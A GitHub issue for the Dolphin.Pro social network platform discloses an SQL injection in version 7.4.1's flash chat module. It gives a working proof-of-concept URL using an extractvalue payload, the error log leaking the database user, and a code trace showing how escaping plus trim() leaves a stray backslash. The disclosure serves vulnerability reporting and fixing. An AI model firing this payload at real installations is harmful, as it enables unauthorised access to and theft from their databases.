search

boonex / dolphin.pro

Dolphin.Pro - Social Network Platform
http://www.boonex.com
MIT License
146 stars 138 forks source link

SQL injection vulnerability bypass filtering #683

Closed SimpleLexie closed 5 years ago

SimpleLexie commented 5 years ago

version: Dolphin-v.7.4.1 POC: http://localhost/flash/XML.php?module=chat&app=1&action=RzSetBlocked&id=admin%27&user=%2bextractvalue(1,concat(0x7e,user()))%23&blocked=true After submitting, view the tmp/error.log file ` --- 2019-04-15T09:25:16+00:00 Type: PDOException Message: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~root@DESKTOP-9ELD8JS' File: E:\TODO\Dolphin-v.7.4.1\inc\classes\BxDolDb.php Line: 169 Trace:

0 E:\TODO\Dolphin-v.7.4.1\inc\classes\BxDolDb.php(169): PDO->query('REPLACE INTO `s...')

1 E:\TODO\Dolphin-v.7.4.1\flash\modules\global\inc\db.inc.php(17): BxDolDb->res('REPLACE INTO `s...')

2 E:\TODO\Dolphin-v.7.4.1\flash\modules\global\inc\db.inc.php(51): BxDbConnect->getResult('REPLACE INTO `s...')

3 E:\TODO\Dolphin-v.7.4.1\flash\modules\chat\inc\customFunctions.inc.php(70): getResult('REPLACE INTO `s...')

4 E:\TODO\Dolphin-v.7.4.1\flash\modules\chat\inc\actions.inc.php(123): blockUser('admin\', ',Profile=extr...', true)

5 E:\TODO\Dolphin-v.7.4.1\flash\XML.php(52): require_once('E:\TODO\Dolphin...')

6 {main}

`

details: Step 1: /flash/modules/chat/inc/actions.inc.php Line 120 Line 10 $sId = isset($_REQUEST['id']) ? process_db_input($_REQUEST['id']) : ""; ...... Line 120 case 'RzSetBlocked': $sUser = isset($_REQUEST['user']) ? **process_db_input**($_REQUEST['user']) : ""; $bBlocked = isset($_REQUEST['blocked']) ? $_REQUEST['blocked'] == TRUE_VAL : false; blockUser($sId, $sUser, $bBlocked); break; Step 2: Track to process_db_input() function process_db_input($sText, $iStripTags = 0) { ...... return $sText; } ...... switch ($iStripTags) { case BX_TAGS_STRIP_AND_NL2BR: return $oDb->escape(nl2br(strip_tags($sText)), false); ...... case BX_TAGS_NO_ACTION: default: return $oDb->**escape**($sText, false); } Then ,Track to escape() `public function escape($sText, $bReal = true) { $pdoEscapted = $this->link->quote($sText);

    if ($bReal) {
        return $pdoEscapted;
    }
    return **trim**($pdoEscapted, "'");
}`

The function quote() will add escaping to the character. such as : admin' --> 'admin\''

The function trim() removes the characters at the beginning and end of the string. such as: 'admin\'' --> admin\

Step 3: Track to blockUser(): `function blockUser($iUserId, $iBlockedId, $bBlock) { bx_import('BxDolAlerts');

if(**$bBlock**) {
    getResult("REPLACE INTO `sys_block_list` SET `ID` = '" . $iUserId . "', `Profile` = '" . $iBlockedId . "'");
    $oZ = new BxDolAlerts('block', 'add', $iBlockedId, $iUserId);
} else {
    getResult("DELETE FROM `sys_block_list` WHERE `ID` = '" . $iUserId . "' AND `Profile` = '" . $iBlockedId . "'");
    $oZ = new BxDolAlerts('block', 'delete', $iBlockedId, $iUserId);
}
$oZ->alert();

} When $bBlock is true, the function getResult() is called, SQL string is "REPLACE INTOsys_block_listSETID= '$iUserId ',Profile` = '$iBlockedId'"

So... when Submit via browser "id=admin%27&user=%2bextractvalue(1,concat(0x7e,user()))%23" blocked=true id=admin%27 --> process_db_input() --> admin\ user=%2bextractvalue(1,concat(0x7e,user()))%23 --> +extractvalue(1,concat(0x7e,user()))# Then Parameters passed to function blockUser(), SQL string is: REPLACE INTOsys_block_listSETID= 'admin\',Profile= '+extractvalue(1,concat(0x7e,user()))#' Q^Q... SQL injection is back. In this way, as long as the two parameters are spliced, SQL injection vulnerabilities may occur.

Other similar scenes: /flash/modules/chat/inc/actions.inc.php Line 137 /flash/modules/chat/inc/actions.inc.php Line 156 /flash/modules/chat/inc/actions.inc.php Line 180 /flash/modules/chat/inc/actions.inc.php Line 198 /flash/modules/chat/inc/actions.inc.php Line 210